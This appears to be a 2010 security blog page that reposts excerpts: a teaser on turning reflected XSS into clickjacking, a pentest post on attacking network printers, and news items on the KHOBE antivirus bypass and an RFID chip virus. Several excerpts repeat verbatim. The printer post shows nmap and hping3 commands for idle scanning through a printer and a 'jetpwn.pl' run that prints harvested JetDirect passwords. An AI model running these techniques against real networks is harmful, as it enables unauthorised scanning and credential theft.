"Those of us who do a lot of work in the security world have come to realize that there is a ton of cross site scripting (XSS) out there. 80% of dynamic sites (or more) suffer from it. But how many sites allow you to do HTML file uploads comparatively? It’s a much smaller amount, and typically requires some sort of login before you’re allowed to do it. Often times it’s protected by login too, so it’s a relatively small amount of people who could be impacted by any sort of HTML file upload. But that is precisely what’s needed to mount a clickjacking attack (usually one or two pages). Either the attacker has to rent space in the cloud with a stolen credit card, or find some parasitic hosting somewhere.
That’s when I got to thinking… how can you use any old generic reflected XSS attack to mount a clickjacking attack? A few hours later I had a prototype that worked. Here’s how the attack would work. Let’s say a parameter like “search” was vulnerable to reflected XSS."
Read More
Tuesday, June 15, 2010
Fun with printers
PART - I
"I don’t see a whole lot on the forums about owning printers during a pen test, so I figured I’d post some stuff here.
First, printers are often overlooked when it comes to securing a network. Why? Because all they’re supposed to do is print. You plug them in, install a driver, and so long as the end user can print, all is well in the world.
Thanks to this misconception, we can use network printers to gather boat loads of information, as well, as bounce through them when port scanning, cause disruption, and, well, screw with people.
First, printers are PERFECT boxes to use when doing a bounce (aka, IPID, zombie, idle, etc.) scan. Example:
nmap -sS -p9100 10.0.0.* --open
..snip..
Nmap scan report for 10.0.0.23
Host is up (0.00055s latency).
PORT STATE SERVICE
9100/tcp open jetdirect
..snip..
Ok, so we know that .23 is a printer. Yay.. lets see how much activity this thing is seeing at the moment..
hping3 10.0.0.23 -r -p 31337
HPING 10.0.0.23 (eth0 10.0.0.23): NO FLAGS are set, 40 headers + 0 data bytes
len=46 ip=10.0.0.23 ttl=64 id=54757 sport=31337 flags=RA seq=0 win=0 rtt=0.6 ms
len=46 ip=10.0.0.23 ttl=64 id=+1 sport=31337 flags=RA seq=1 win=0 rtt=0.9 ms
len=46 ip=10.0.0.23 ttl=64 id=+1 sport=31337 flags=RA seq=2 win=0 rtt=0.7 ms
len=46 ip=10.0.0.23 ttl=64 id=+1 sport=31337 flags=RA seq=3 win=0 rtt=0.7 ms
len=46 ip=10.0.0.23 ttl=64 id=+1 sport=31337 flags=RA seq=4 win=0 rtt=0.8 ms
Sweet.. each IP ID is incremented by 1, this indicates that there’s no other traffic on this printer at the moment. We can use this to bounce through when doing a scan against the PDC...."
Read More
PART - II
"Ok, I’ll admit, the last post didn’t have a whole lot to do with printers, but it probably got you interested enough to read part 2.
First, lets find our network printers..
./jetpwn.pl eth0
Using range 10.0.0.1-255
Password for JetDirect running on 10.0.0.22
Hex password: 49 4e 54 45 52 57 45 42 5a
ASCII password: INTERWEBZ
Password for JetDirect running on 10.0.0.23
Hex password: 50 57 4e 5a
ASCII password: PWNZ
Not only did that find the network printers, it also grabbed and converted the password for us. "
Read More
"I don’t see a whole lot on the forums about owning printers during a pen test, so I figured I’d post some stuff here.
First, printers are often overlooked when it comes to securing a network. Why? Because all they’re supposed to do is print. You plug them in, install a driver, and so long as the end user can print, all is well in the world.
Thanks to this misconception, we can use network printers to gather boat loads of information, as well, as bounce through them when port scanning, cause disruption, and, well, screw with people.
First, printers are PERFECT boxes to use when doing a bounce (aka, IPID, zombie, idle, etc.) scan. Example:
nmap -sS -p9100 10.0.0.* --open
..snip..
Nmap scan report for 10.0.0.23
Host is up (0.00055s latency).
PORT STATE SERVICE
9100/tcp open jetdirect
..snip..
Ok, so we know that .23 is a printer. Yay.. lets see how much activity this thing is seeing at the moment..
hping3 10.0.0.23 -r -p 31337
HPING 10.0.0.23 (eth0 10.0.0.23): NO FLAGS are set, 40 headers + 0 data bytes
len=46 ip=10.0.0.23 ttl=64 id=54757 sport=31337 flags=RA seq=0 win=0 rtt=0.6 ms
len=46 ip=10.0.0.23 ttl=64 id=+1 sport=31337 flags=RA seq=1 win=0 rtt=0.9 ms
len=46 ip=10.0.0.23 ttl=64 id=+1 sport=31337 flags=RA seq=2 win=0 rtt=0.7 ms
len=46 ip=10.0.0.23 ttl=64 id=+1 sport=31337 flags=RA seq=3 win=0 rtt=0.7 ms
len=46 ip=10.0.0.23 ttl=64 id=+1 sport=31337 flags=RA seq=4 win=0 rtt=0.8 ms
Sweet.. each IP ID is incremented by 1, this indicates that there’s no other traffic on this printer at the moment. We can use this to bounce through when doing a scan against the PDC...."
Read More
PART - II
"Ok, I’ll admit, the last post didn’t have a whole lot to do with printers, but it probably got you interested enough to read part 2.
First, lets find our network printers..
./jetpwn.pl eth0
Using range 10.0.0.1-255
Password for JetDirect running on 10.0.0.22
Hex password: 49 4e 54 45 52 57 45 42 5a
ASCII password: INTERWEBZ
Password for JetDirect running on 10.0.0.23
Hex password: 50 57 4e 5a
ASCII password: PWNZ
Not only did that find the network printers, it also grabbed and converted the password for us. "
Read More
Wednesday, June 9, 2010
Researchers use new exploit to bypass 100 percent of tested AV software
"The Internet just got more dangerous, in terms of malware, if this study is correct. Researchers have discovered a method of bypassing security software, one that they said tested successfully against all 34 of the products tested.
matousec.com said the exploit is usable even if the account does not possess administrative privileges. Among the big names vulnerable according to the report are Symantec (Norton), McAfee, Kaspersky, NOD32, and ZoneAlarm.
All that's required, the researchers said, is for the security software use System Service Descriptor Table (SSDT) hooks to modify parts of the OS kernel. The researchers have named the exploit KHOBE."
READ MORE...
matousec.com said the exploit is usable even if the account does not possess administrative privileges. Among the big names vulnerable according to the report are Symantec (Norton), McAfee, Kaspersky, NOD32, and ZoneAlarm.
All that's required, the researchers said, is for the security software use System Service Descriptor Table (SSDT) hooks to modify parts of the OS kernel. The researchers have named the exploit KHOBE."
READ MORE...
Man infects himself with computer virus
"University of Reading researcher Mark Gasson has become the first human known to be infected by a computer virus.
The virus, infecting a chip implanted in Gasson's hand, passed into a laboratory computer. From there, the infection could have spread into other computer chips found in building access cards.
All this was intentional, in an experiment to see how simple radio-frequency identification (RFID) chips like those used for tracking animals can host and spread technological diseases.
Story continues below ↓advertisement | your ad here
The research from the British university shows that as implantable bionic devices such as pacemakers get more sophisticated in the years ahead, their security and the safety of the patients whose lives depend on them will become increasingly important, said Gasson."
Read More
The virus, infecting a chip implanted in Gasson's hand, passed into a laboratory computer. From there, the infection could have spread into other computer chips found in building access cards.
All this was intentional, in an experiment to see how simple radio-frequency identification (RFID) chips like those used for tracking animals can host and spread technological diseases.
Story continues below ↓advertisement | your ad here
The research from the British university shows that as implantable bionic devices such as pacemakers get more sophisticated in the years ahead, their security and the safety of the patients whose lives depend on them will become increasingly important, said Gasson."
Read More
Subscribe to:
Posts (Atom)
